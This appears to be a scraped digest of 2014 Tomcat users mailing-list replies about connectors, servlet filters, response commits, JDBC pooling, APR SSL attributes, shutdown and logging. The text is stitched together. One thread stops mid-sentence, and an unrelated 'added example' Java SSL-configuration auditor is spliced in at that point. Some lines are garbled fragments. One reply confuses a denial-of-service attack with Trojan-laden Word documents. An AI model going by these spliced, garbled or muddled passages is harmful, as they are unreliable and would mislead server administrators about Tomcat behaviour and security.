Stick with the NIO connector. If you are using AJP to connect httpd to Tomcat, you will probably be better off with the BIO connector, actually. It's simpler and basically bug-free given its maturity. Since there is a 1:1 map between Tomcat and httpd connections, there's no really good reason to switch to another connector IMO.

- -chris

Chris,

I'm not sure about what kind of connector I'm using. This is my configuration.

httpd-2.2.3-65.el5.centos + tomcat-connectors-1.2.28-src + tomcat-connectors-1.2.28-src

    [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/mod_jk.conf
    JkWorkersFile /etc/httpd/conf.d/workers.properties
    JkLogFile /var/log/httpd/mod_jk.log
    JkLogLevel info
    JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "
    JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
    JkRequestLogFormat "%w %V %T"
    JkMount /* worker1
    JkShmFile /etc/httpd/logs/jk-runtime-status

    [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/workers.properties
    workers.tomcat_home=/usr/share/apache-tomcat-6.0.37/
    workers.java_home=/usr/java/default
    ps=/
    worker.list=worker1
    worker.default.port=8009
    worker.default.host=localhost
    worker.default.type=ajp13

Is there anyway to check which type is this NIO or BIO?

MG check the Connector in server.xml

-- Randeep
RE: filter question
you'll need to pass your modified response to service method of servlet which is *in* the filterChain

    ApplicationFilterChain::internalDoFilter(ServletRequest request, ServletResponse response)
            throws IOException, ServletException {
        servlet.service(request, response);
        ...
    }

Martin

Date: Thu, 13 Mar 2014 17:51:59 -0700
Subject: filter question
From: catph...@catphive.net
To: users@tomcat.apache.org

I have a filter with doFilter method like this:

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        resp.setHeader("Cache-Control", "must-revalidate, max-age=0, post-check=0, pre-check=0");
        chain.doFilter(request, response);
    }

This sets the header. However, if I set the header *after* chain.doFilter, the header is not set. Why is this?

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        chain.doFilter(request, response);
        resp.setHeader("Cache-Control", "must-revalidate, max-age=0, post-check=0, pre-check=0");
    }

Programmatically I can see the header is null. Has the content already been sent to the web browser after chain.doFilter? If so, is there a way to delay sending data to the browser? I need to inspect the status code in the response before setting my header (to prevent 404's from being cached).

Thanks,
Brendan Miller
RE: Stream closed- IOException exception
Date: Thu, 6 Mar 2014 11:13:22 +0530
Subject: Re: Stream closed- IOException exception
From: prashantkada...@gmail.com
To: users@tomcat.apache.org

On Wed, Mar 5, 2014 at 9:34 PM, Christopher Schultz ch...@christopherschultz.net wrote:

Prashant,

On 3/5/14, 9:14 AM, Prashant Kadam wrote:
On Wed, Mar 5, 2014 at 7:11 PM, Prashant Kadam prashantkada...@gmail.com wrote:
On Mon, Mar 3, 2014 at 10:55 PM, Christopher Schultz ch...@christopherschultz.net wrote:

Prashant,

On 3/3/14, 6:04 AM, Prashant Kadam wrote:

please help ... I have removed whitespaces by adding

    <jsp-config>
      <jsp-property-group>
        <url-pattern>*.jsp</url-pattern>
        <trim-directive-whitespaces>true</trim-directive-whitespaces>
      </jsp-property-group>
    </jsp-config>

but still i am facing same error.

This may or may not do anything.

I tried to increase the buffer size also as,

    <%@ page buffer="800kb" autoFlush="false" %>

but still same error

Hm. With a huge buffer, the only reason the response would have been committed is if a flush() was being called somewhere. You said you gutted the struts actions, but it's possible that somewhere, Struts is internally flushing the buffer. (That would surprise me, honestly).

Are you sure there are no errors occurring anywhere? Often, an error will cause the response to be committed.

BTW you probably never want to use autoFlush=false unless you are watching the buffer very carefully. For debugging, it's fine, but you certainly don't want to do that on a regular basis.

stuck on this issue for more than 2 weeks now and need to close it ASAP please help.

Remember that this is a community made up of volunteers. This problem / ticket is *yours* and not ours to be solved ASAP. Everybody's issues need to be solved ASAP, of course. If you want something done ASAP and you can't do it yourself, then you'll have to pay someone else to do it.

Any help/ pointer would be highly appreciated. one more thing, we are using struts version 1 and tiles 2.2. as struts1 doesn't work with tiles2, we have used struts-tiles2-1.4.0-SNAPSHOT.jar, can this create any problem, but this combination work with tomcat version below 7.0.37 and giving issues from version 7.0.39. Can anybody please tell me what are the changes in between these two versions which can produce this error ??

You could take a look at the Changelog for version 7.0.39 (or .38) to see if anything looks probable.

I recommend using a debugger as Konstantin suggests and trap the condition. You'll be able to unwind the stack to see what code is causing the response to be committed.

hi

Thanks for your reply. I started debugging the code and found some pointers but not able to fully identify the root cause. What I found is,

In TilesRequestProcessor class

    protected void doForward(
            String uri,
            HttpServletRequest request,
            HttpServletResponse response)
            throws IOException, ServletException {
        if (response.isCommitted()) {
            this.doInclude(uri, request, response);
        } else {
            super.doForward(uri, request, response);
        }
    }

with version 7.0.39, somewhere org.apache.jasper.runtime.ServletResponseWrapperInclude.*isCommited* is setting to false, causing forward but response is already committed and throws IO Exception.

with version 7.0.37, particularly for this request this flag sets to true and it works.

any pointers on this ? how can I find from where this is setting to false ?

I found the class *org.apache.coyote.Response* ... where this flag is being set,

    public void setCommitted(boolean v) {
        this.commited = v;
    }

its default value is false and in my case it does not come here when I debug, so remains false. But when I use 7.0.37, this method gets called and it sets this flag to true.

Is there any changes in tomcat which can cause this behavior ?

I'm not sure. What did the stack trace look like when setCommitted(true) was called? That's more important than knowing /that/ it was called...

hi Chris

thanks for reply

May be I failed to explain properly my understanding, I will explain the scenario once again

I am including one jsp in another jsp, there are different behaviors for 2 tomcat versions as below

1. case in 7.0.37 - setCommitted(true) was called and thus in tiles code (pasted below), it includes the jsp and works fine with no exception thus no stack trace

TilesRequestProcessor class

    protected void doForward(
            String uri,
            HttpServletRequest request,
            HttpServletResponse response)
            throws IOException, ServletException {
        if (response.isCommitted()) {
            this.doInclude(uri, request, response);
        } else {
            super.doForward(uri, request, response);
        }

MGDO NOT COMMIT THE RESPONSE HERE IN THIS SERVLET
MGALLOW URL YOU
RE: understanding jdbc pool
From: neven.cvetko...@gmail.com
Date: Wed, 5 Mar 2014 20:25:36 -0500
Subject: Re: understanding jdbc pool
To: users@tomcat.apache.org

On Wed, Mar 5, 2014 at 3:15 PM, S Ahmed sahmed1...@gmail.com wrote:

Hi, With jdbc pool, is each socket connection in the pool handled by a separate thread?

Ahmed, thanks for asking this question - it is sometimes very confusing with all different kind of pools: connection pools, threadpools, etc...

Chris pointed out already - the connection pool does not have any threads... It is not a process that runs in the background, these are just connection objects that are sitting in memory.

Threads are created by the Tomcat container (executor) once the connection is received by the Connector. The created thread is then going to be handled by the container and it will go through the stack call, through Valves, Filters, Servlets, your middleware layer, DAOs, JDBC/JPA calls and then finally through your datasource object, connection, PreparedStatement, ResultSet, etc... and back all the way to the socket that browser initiated, returning the thread to the threadpool (e.g. http-bio-8080).

Now, I am not sure about the connection pool implementation details, how connection pool keeps connections open, if there are any background threads that are handling connection management (closing abandoned connections, opening new connections as the demand rises, etc...) Maybe someone can comment on that.

MGNot from 1.4 commons-dbcp..here is a typical reference to Thread in source
MGThread.currentThread().
MG(Although I have seen multiple thread calls in attached testcases) I have not seen Separate Thread in main body
MGI am sure someone here would put a feature request in to support Thread-Aware Connections
MGIf you put the feature request in I will second the request (and make sure ThreadAware gets implemented)
MGThen again Im sure there are other libraries that will handle Thread aware database connection pools
MGwould anyone know the names of those libraries?
MGBTW Mr Schultz is right

Say you have 20 connections set to be open at minimum, does that mean there will be 20 threads? If not, then there is a degree of serialization then right?

Well, there will be no serialization, but rather synchronization as there are at most available connections, if the connection pool (datasource) reaches maximum allowed connections, depending on the implementation - it would be a blocking call, until the pool has available connection to provide...

Look at the documentation for Tomcat default connection pool implementation:
https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html

Hopefully that clears some of the confusion.

Cheers!
Neven
RE: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed
FYI

If you are using NIO Connector you will want to supply these NIO Connector attributes
https://tomcat.apache.org/tomcat-7.0-doc/config/http.html#Standard_Implementation

If you are using SSL on NIO read SSL on NIO for that capability

APR Native SSL would use these parameters

Attribute: Description

SSLCACertificateFile: See the mod_ssl documentation.
SSLCACertificatePath: See the mod_ssl documentation.
SSLCARevocationFile: See the mod_ssl documentation.
SSLCARevocationPath: See the mod_ssl documentation.
SSLCertificateChainFile: See the mod_ssl documentation.

SSLCACertificateFile: Name of the file that contains the concatenated certificates for the trusted certificate authorities. The format is PEM-encoded.
SSLCACertificatePath: Name of the directory that contains the certificates for the trusted certificate authorities. The format is PEM-encoded.
SSLCARevocationFile: Name of the file that contains the concatenated certificate revocation lists for the certificate authorities. The format is PEM-encoded.
SSLCARevocationPath: Name of the directory that contains the certificate revocation lists for the certificate authorities. The format is PEM-encoded.
SSLCertificateChainFile: Name of the file that contains concatenated certificates for the certificate authorities which form the certificate chain for the server certificate. The format is PEM-encoded.
SSLCertificateFile: Name of the file that contains the server certificate. The format is PEM-encoded.
SSLCertificateKeyFile: Name of the file that contains the server private key. The format is PEM-encoded. The default value is the value of SSLCertificateFile and in this case both certificate and private key have to be in this file (NOT RECOMMENDED).
SSLCipherSuite: Ciphers which may be used for communicating with clients. The default is ALL, with other acceptable values being a list of ciphers, with : used as the delimiter (see OpenSSL documentation for the list of ciphers supported).
SSLDisableCompression: Disables compression if set to true and OpenSSL supports disabling compression. Default is false which inherits the default compression setting in OpenSSL.
SSLHonorCipherOrder: Set to true to enforce the server's cipher order (from the SSLCipherSuite setting) instead of allowing the client to choose the cipher (which is the default).
SSLPassword: Pass phrase for the encrypted private key. If SSLPassword is not provided, the callback function should prompt for the pass phrase.
SSLProtocol: Protocol which may be used for communicating with clients. The default value is all, which is equivalent to SSLv3+TLSv1 with other acceptable values being SSLv2, SSLv3, TLSv1 and any combination of the three protocols concatenated with a plus sign. Note that the protocol SSLv2 is inherently unsafe.
SSLVerifyClient: Ask client for certificate. The default is none, meaning the client will not have the opportunity to submit a certificate. Other acceptable values include optional, require and optionalNoCA.
SSLVerifyDepth: Maximum verification depth for client certificates. The default is 10.

Tweak these Connector timeout parameters to accommodate your requirement

asyncTimeout
connectionTimeout
connectionUploadTimeout
disableUploadTimeout
executorTerminationTimeoutMillis
keepAliveTimeout
socket.soTimeout
socket.unlockTimeout
selectorTimeout
sessionTimeout

(yes..Mr Schultz is correct on the last statement)

Martin-

Date: Wed, 5 Mar 2014 15:12:02 +0200
Subject: Re: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed
From: dmitry.batiyevs...@ardas.dp.ua
To: users@tomcat.apache.org

Atmosphere upgrade didn't help

Regards,
Dmitry Batiyevskiy
Ardas Group Inc.
www.ardas.dp.ua

2014-03-05 9:39 GMT+02:00 Dmitry Batiyevskiy dmitry.batiyevs...@ardas.dp.ua :

We are ok with tomcat 7.0.42 and old tcnative now, and may be next tcnative update will work appropriately

We will try updating atmosphere before trying NIO anyway

Regards,
Dmitry Batiyevskiy
Ardas Group Inc.
www.ardas.dp.ua

2014-03-04 23:18 GMT+02:00 Christopher Schultz ch...@christopherschultz.net:

Dmitry,

On 3/4/14, 2:48 AM, Dmitry Batiyevskiy wrote:

Howard, My connector config is the following (i've already posted that):

    <Connector port="8443" maxHttpHeaderSize="8192" maxThreads="15000"
               enableLookups="false" disableUploadTimeout="true" acceptCount="100"
               scheme="https" secure="true" SSLEnabled="true" compression="off"
               SSLCertificateFile="/opt/tomcat/mycompany.com.crt"
               SSLCertificateKeyFile="/opt/tomcat/mycompany.com.key" />

Also -Dhttps.protocols=TLSv1 option is passed to java machine

The reason for me to use apr connector is https performance, isn't NIO much slower in that?

I don't have any recent performance data, but using OpenSSL is apparently measurably faster than using
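Added example (not from the thread or the Tomcat project): a small Java check, with the hypothetical class name `AprConnectorAudit`, that reads a server.xml and reports SSL-enabled connectors that rely on the APR defaults described in the attribute list above (SSLProtocol all, SSLCipherSuite ALL, client-chosen cipher order, inherited compression). It assumes the connector is the APR/native one; the sample input is constructed from the connector quoted in this thread, with its attribute quotes restored.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

/** Hypothetical auditor for APR SSL connector attributes in server.xml. */
public class AprConnectorAudit {

    // Constructed sample: the connector from the thread wrapped in a minimal server.xml.
    static final String SAMPLE =
          "<Server><Service name=\"Catalina\">"
        + "<Connector port=\"8443\" maxHttpHeaderSize=\"8192\" maxThreads=\"15000\""
        + " enableLookups=\"false\" disableUploadTimeout=\"true\" acceptCount=\"100\""
        + " scheme=\"https\" secure=\"true\" SSLEnabled=\"true\" compression=\"off\""
        + " SSLCertificateFile=\"/opt/tomcat/mycompany.com.crt\""
        + " SSLCertificateKeyFile=\"/opt/tomcat/mycompany.com.key\" />"
        + "</Service></Server>";

    private static void check(List<String> out, String port, boolean bad, String msg) {
        if (bad) {
            out.add("Connector port " + port + ": " + msg);
        }
    }

    static List<String> audit(String serverXml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // server.xml needs no DTD; refusing DOCTYPE keeps the auditor itself safe from XXE.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(new InputSource(new StringReader(serverXml)));

        List<String> findings = new ArrayList<>();
        NodeList connectors = doc.getElementsByTagName("Connector");
        for (int i = 0; i < connectors.getLength(); i++) {
            Element c = (Element) connectors.item(i);
            if (!"true".equalsIgnoreCase(c.getAttribute("SSLEnabled"))) {
                continue; // plain HTTP or AJP connector
            }
            String port = c.getAttribute("port");

            // getAttribute() returns "" when the attribute is absent.
            String proto = c.getAttribute("SSLProtocol").trim();
            boolean legacy = false;
            for (String p : proto.split("\\+")) {
                String name = p.trim();
                if (name.equalsIgnoreCase("SSLv2") || name.equalsIgnoreCase("SSLv3")) {
                    legacy = true;
                }
            }
            check(findings, port, proto.isEmpty() || proto.equalsIgnoreCase("all"),
                  "SSLProtocol not set or 'all' (default is SSLv3+TLSv1)");
            check(findings, port, legacy,
                  "SSLProtocol explicitly enables SSLv2/SSLv3: " + proto);

            String ciphers = c.getAttribute("SSLCipherSuite").trim();
            check(findings, port, ciphers.isEmpty() || ciphers.equalsIgnoreCase("ALL"),
                  "SSLCipherSuite not set or 'ALL' (every OpenSSL cipher is offered)");

            check(findings, port,
                  !"true".equalsIgnoreCase(c.getAttribute("SSLHonorCipherOrder")),
                  "SSLHonorCipherOrder is not true (the client picks the cipher)");

            check(findings, port,
                  !"true".equalsIgnoreCase(c.getAttribute("SSLDisableCompression")),
                  "SSLDisableCompression is not true (OpenSSL compression default applies)");

            check(findings, port, c.getAttribute("SSLCertificateKeyFile").isEmpty(),
                  "SSLCertificateKeyFile not set (private key expected inside the certificate file)");
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        for (String finding : audit(SAMPLE)) {
            System.out.println(finding);
        }
    }
}
```

For the sample connector this reports four findings (protocol, cipher suite, cipher order, compression). The `-Dhttps.protocols=TLSv1` system property mentioned in the thread configures outgoing `HttpsURLConnection` clients in the JVM; it does not restrict what the APR connector accepts.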
RE: Difference between process kill and shutdown
Date: Sat, 1 Mar 2014 04:11:57 -0800
Subject: Difference between process kill and shutdown
From: akash.delh...@gmail.com
To: users@tomcat.apache.org

On our linux boxes, we have multiple users who run tomcat. Currently we are using process kill commands to kill the respective user's tomcat, instead of using shutdown.sh

MGBad Practice

Are there any downsides of using this approach ?

MGThere are horrible downsides
MGA Kill will take the running process out of the execution environment..no matter what the side effect is
MGHooks to any of the configured Server Listeners CATALINA has started can be ignored and usually are
MGThe result of a kill on parent process is
MG you will still have one or more Listeners running as child daemons since they were never shutdown properly
MGWhoever told you to use the kill command instead of shutdown should be court-martialed!

Thanks,
Akash
RE: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed
I assume based on all the wonderful experiences the states have experienced in last dozen years that Canada has wised up and stopped Americans from sneaking across the border without a passport? better pack you snowshoes..they have about 6 feet of snow (last time i checked) Keep me apprised, M- Date: Tue, 25 Feb 2014 11:50:30 -0400 Subject: Re: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed From: charle...@thelearningbar.com To: users@tomcat.apache.org On Tue, Feb 25, 2014 at 11:37 AM, Daniel Mikusa dmik...@gopivotal.comwrote: On Feb 25, 2014, at 10:14 AM, Charles Richard charle...@thelearningbar.com wrote: Hi, On Tue, Feb 25, 2014 at 1:26 AM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Charles, On 2/24/14, 10:15 AM, Charles Richard wrote: Sorry if this is not the right forum for this kind of inquiry. I figure the best candidates would be in this forum from personal experience. Our company is having production issues which I believe are either due to application inefficiencies or a bug somewhere in our software stack. We are having production issues with our Tomcat connection pool using c3p0 and while my knowledge in this area has improved, I lack the Java developer background that might help in this area and we are at a point where we need this solved quickly. I've never gotten the sense that c3p0 was production-ready. What made you deploy with c2p0 instead of either of the two connection pools that ship with Tomcat? (Note that c3p0 has nothing to do with Tomcat, other than that Tomcat can be configured to use c3p0 as its connection-pool). That is good to know that c3p0 might not be commonly used in production by companies using tomcats. I was under the impression it was the most commonly used. The problems could be related to leaked connections which I'm quite sure we have. 
I have turned on c3p0 debugging and identified this in the past and the ideal consultant could identify in our code where those are happening and fix them. Both pools Tomcat provides can help you track-down so-called abandoned connections by providing stack traces that point to the line of code that obtained the connection (or even Statement or ResultSet). C3P0 also allows you to track down abandoned connections and my gut feeling tells me how problem is not tied down exclusively to this as our Tomcat connection pools go from 1 used connection to 150 in a minute and I know we are not losing that many leaked connections in a minute. Regardless, I will check with the manager here to see if this has been tried in the past before I started this job and potentially try this as unfortunately, the problem is not happening in our staging environment. When you are experiencing the problem next, take some thread dumps. Try to get two or three, with 10 to 15 seconds between each one. You can then look at the thread dumps to see what's going on here. https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It's not easy to get good thread dumps as one minute things are fine and the next minute, the site is going downhill. I have bash scripts that monitor c3p0 connections and take an automatic thread dump as soon as the number exceeds what's normal. There is information about interpreting them here or if you need help with it, you could post it to the list. https://wiki.apache.org/tomcat/HowTo#How_do_I_read_a_Java_thread_dump_.3F I have tried to analyze the thread dumps I have gotten so far without much luck but this could just be that I don't understand enough what I'm looking for. I will look at the link provided. Thanks for taking the time to write this! 
Dan Cheers, Charles I would highly recommend that you read this blog post I wrote several years ago that can help you look for obvious errors by providing examples for what JDBC code should look like -- if you are managing your own JDBC calls of course: http://blog.christopherschultz.net/index.php/2009/03/16/properly-handling-pooled-jdbc-connections/ We are looking to hire a consultant that would come to Fredericton, NB, Canada to work with us on this problem. Serious inquiries only. I will be looking for proof that you have extensive experience with Tomcat, Java Spring and c3p0. If you are interested, send me your resume (through your company or individually) and send me as much proof as possible of your experience with the specific technologies mentioned. While there is certainly no prohibition against doing so, this isn't really a help wanted message board. We are happy to help you -- for free! -- via email to solve your own problems. If you find this free forum helpful, please
RE: Status of the current IIS ISAPI Redirector for Tomcat
This is a TC Users list so I will redirect the conversation to how do we use SPD in a Tomcat implementation TO Wit: what you're asking is there support for SPDY Protocol in any version of TOMCAT? Since SPDY requires the use of SSL/TLS (with TLS extension NPN) Which version TC Container supports TLS/NPM? *gruss* Martin __ From: kpreis...@apache.org To: users@tomcat.apache.org Subject: RE: Status of the current IIS ISAPI Redirector for Tomcat Date: Sat, 15 Feb 2014 15:00:44 +0100 Hi Angel and Bilal, thank you for your replies. -Original Message- From: Angel Java Lopez [mailto:ajlopez2...@gmail.com] Sent: Saturday, February 15, 2014 11:59 AM To: Tomcat Users List Subject: Re: Status of the current IIS ISAPI Redirector for Tomcat Very interesting! Yes, managed code is the path to follow. First idea non-blocking IO (from C# client side): use the new async/await for the communication. But force to use the new .NET framework and Visual Studio. And await is a wait on the current threads: http://msdn.microsoft.com/en-us/library/hh750082.aspx Maybe, a node.js approach, with a callback: http://stackoverflow.com/questions/16894907/creating-asynchronous- methods-with-task-factory-and-callback and only .NET 4.0: http://msdn.microsoft.com/en-us/library/dd537612(v=vs.100).aspx I don't still see the value of await: it blocked the current thread. I guess it is better to use a callback A await on a Task in C# should internally return the current thread back to a threadpool, and use a callback on another thread to continue execution of the method when the Task is finished, so that threads are not blocked when waiting e.g. for an I/O operation to complete. For a full utilization of asynchronous I/O, one would not only have to use async read/write operations when forwarding the request to Tomcat, but also async flush the response body at IIS to the client (and async read the request body). 
Although the .Net HttpResponse also seem to have BeginFlush() and EndFlush() methods that apply the old-style async programming pattern, in the SPDY Redirector (see below) I'm using Task.Factory.FromAsync(...) to convert these Begin/End-Methods into one that returns a Task, so that it can be integrated into the existing Task-based async code. For async flush and read operations at IIS to work, one will need to create an async module (IHttpModule, but use context.AddOnBeginRequestAsync() methods to add event handlers) or an async handler (derived from HttpTaskAsyncHandler). This is the approach that I use on a draft of an SPDY redirector that can already be tested with Jetty (but not yet with Tomcat), see [1]. After switching from blocking I/O to async methods, the number of threads of the IIS apppool (w3wp.exe) was greatly reduced when having a slow output producer (servlet) on the Jetty side, and a fast client connecting to IIS (but should also work for the more likely scenario: A fast output producer (Jetty) and a slow client); as with blocking I/O, the IIS threads would spend most of their time with doing nothing, whereas with the async approach, they can do other things meanwhile. This approach suits the idea of a multiplexing SPDY as you can send multiple requests on a single SPDY connection, so it doesn't block resources like sockets or threads for the duration of an request. With SPDY, it should also be possible to forward Websocket connections which is AFAIK not possible with AJP. Angel Java Lopez @ajlopez On Fri, Feb 14, 2014 at 9:26 PM, Bilal S bilal.so...@gmail.com wrote: Konstantin, snip == You raise good points. I have run into similar issues and thus created my own project outside the Apache foundation three years ago (BonCode). It is a C# based AJP connector. It can currently be used with Tomcat, JBOSS, Jetty. 
From support requests I am surmising that is currently bundled with software from a few manufacturers including: EMC, CSC, Siemens and others instead of ISAPI redirector. Thus, I do encourage the update of the current IIS connection mechanism to a more up-to-date method. Using a managed code mechanism is the way to go in my opinion. In the long run SPDY may also be of interest for the same purpose. The more choices the better. The following are differences already in existence with BonCode and in response to your extensive writing, only read on if you are curious:: Thank you for you detailed response, this is very helpful. snip 6. As far as I can see, the ISAPI redirector uses blocking I/O when forwarding requests to Tomcat. This means when a slow client sends a request to IIS which gets forwarded to Tomcat, and Tomcat starts to send the response, in the IIS worker process at least
RE: Unable to shutdown Tomcat
MGton of log information is missing..you must have disabled the logs somehow

Date: Fri, 14 Feb 2014 21:51:55 -0500
From: ch...@christopherschultz.net
To: users@tomcat.apache.org
Subject: Re: Unable to shutdown Tomcat

Pooja,

On 2/14/14, 5:49 PM, Pooja Swamy wrote:

Okay. Here you go -

myMac:runtime test$ bin/catalina.sh run
Using CATALINA_BASE: /Users/test/software/runtime
Using CATALINA_HOME: /Users/test/software/runtime
Using CATALINA_TMPDIR: /Users/test/software/runtime/temp
Using JRE_HOME: /System/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home
Using CLASSPATH: /Users/test/software/runtime/bin/bootstrap.jar:/Users/test/software/runtime/bin/tomcat-juli.jar
Feb 14, 2014 2:47:46 PM org.apache.catalina.core.AprLifecycleListener init
INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: .:/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java

There must be more. Is there nothing else printed after that? You go back to a command prompt?

MGconfirm these entries in $CATALINA_HOME/conf/catalina.policy

    grant codeBase "file:${catalina.home}/bin/tomcat-juli.jar" {
        permission java.io.FilePermission "${java.home}${file.separator}lib${file.separator}logging.properties", "read";
        permission java.io.FilePermission "${catalina.base}${file.separator}conf${file.separator}logging.properties", "read";
        permission java.io.FilePermission "${catalina.base}${file.separator}logs", "read, write";
        permission java.io.FilePermission "${catalina.base}${file.separator}logs${file.separator}*", "read, write";

MGalso if you do have a custom logging.properties you will need to define LOGGING_CONFIG
MGduring catalina.bat start e.g

    MGrem LOGGING_CONFIG (Optional) Override Tomcat's logging config file
    rem Example (all one line)
    rem set LOGGING_CONFIG="-Djava.util.logging.config.file=%CATALINA_BASE%\conf\logging.properties"

-chris
MG-martin
RE: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.
Date: Fri, 14 Feb 2014 14:19:04 -0800
Subject: Re: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.
From: davek1...@gmail.com
To: users@tomcat.apache.org

OK I added servlet-api.jar and jsp-api.jar to the Launch Configuration | Classpath | Bootstrap Entries and get the following error report:

HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver

MGDave
MGcan you confirm el-api.jar is located in lib folder of $CATALINA_HOME ?
MG$CATALINA_HOME/lib/el-api.jar
MGMartin-

*note* *The full stack trace of the root cause is available in the Apache Tomcat/7.0.50 logs.*

Apache Tomcat/7.0.50
RE: sudden increase in tomcat sessions..?
DOS (Denial of Service) Attack

one type is endless ping

if someone is running an endless loop of ping attacks on your TC server you can disable ICMP on TC server
https://www.serverintellect.com/support/windowsserversecurity/disable-icmp-requests/

DOC attack usually results in TROJ_MDROPPER.* on system

NAV and McAfee can detect these malware attachments on Word Docs
http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-doc-files-in-targeted-attack/

HTH
Martin

Date: Sat, 8 Feb 2014 19:54:32 -0500
Subject: Re: sudden increase in tomcat sessions..?
From: kumarkm...@gmail.com
To: users@tomcat.apache.org

Hi David,

Thanks for your reply. How can I verify that it is a DOC attack? which log i should refer. please guide me.

Thanks,
Kumar.

On Sat, Feb 8, 2014 at 7:42 PM, David Kerber dcker...@verizon.net wrote:

On 2/8/2014 7:08 PM, Kumar Muthuramalingam wrote:

Hi, I 'm using tomcat version 6 and 7. One day there was a sudden increase in number of sessions in both tomcats. And all the sessions had no username, same lastaccessed time, same created time and the inactive time was 00:00:00. It is not happening always but it happens some times on some day. Can't predict. And We have set the idle timeout as -1 because we have to. When I try to dig the log. It showed that the load balancer IP was sending many ping requests to our application. Can anybody tell why this is happening and how can I find the cause?

DOS attack?

Thanks,
Kumar.
RE: Menu is not working for since Tomcat 7.0.42
Date: Thu, 9 Jan 2014 15:41:21 +0530
Subject: Menu is not working for since Tomcat 7.0.42
From: cch...@gmail.com
To: users@tomcat.apache.org

Hello,

We have a web application which has menus and sub menus which are basically divs. On clicking on menu we are showing the sub menus. This happens through AJAX request. The application was working fine till Tomcat 7.0.41. But since 7.0.42 it stopped working. We are using jdk 7. We did not change anything between 7.0.41 and 7.0.42 in our side. Could anyone give me pointer regarding the issue?

MGImpossible... until you show us the code you are running
MGZip up (server.xml and web.xml) jsps, java code,templates..the works..put on dropbox and send the link

Thanks in advance.
Chinmoy
RE: detailed APR/SSL logging
Date: Tue, 7 Jan 2014 14:51:21 +0500
Subject: detailed APR/SSL logging
From: sanaulla...@gmail.com
To: users@tomcat.apache.org

Hi,

Does anyone know how I can get detailed APR/SSL debug logs? I need to know where my SSL session is getting broken. There is nothing in the catalina.out log.

usage: java org.apache.catalina.startup.Catalina [ -config {pathname} ] [ -nonaming ] { -help | start | stop }
Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
INFO: Loaded APR based Apache Tomcat Native library 1.1.29 using APR version 1.5.1.
Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters [false], random [true].
Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener initializeSSL
INFO: OpenSSL successfully initialized (OpenSSL 1.0.1e 11 Feb 2013)
Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler [http-apr-8080]
Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler [http-apr-0.0.0.0-8443]
Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 696 ms
Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardService startInternal
INFO: Starting service Catalina
Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.47
Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/docs
Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/manager
Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/ROOT
Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/host-manager
Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/examples
Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler [http-apr-8080]
Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler [http-apr-0.0.0.0-8443]
Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.Catalina start
INFO: Server startup in 935 ms

-- The server looks up properly with openssl and certs, but when I try to connect to it with openssl s_client I get an error --

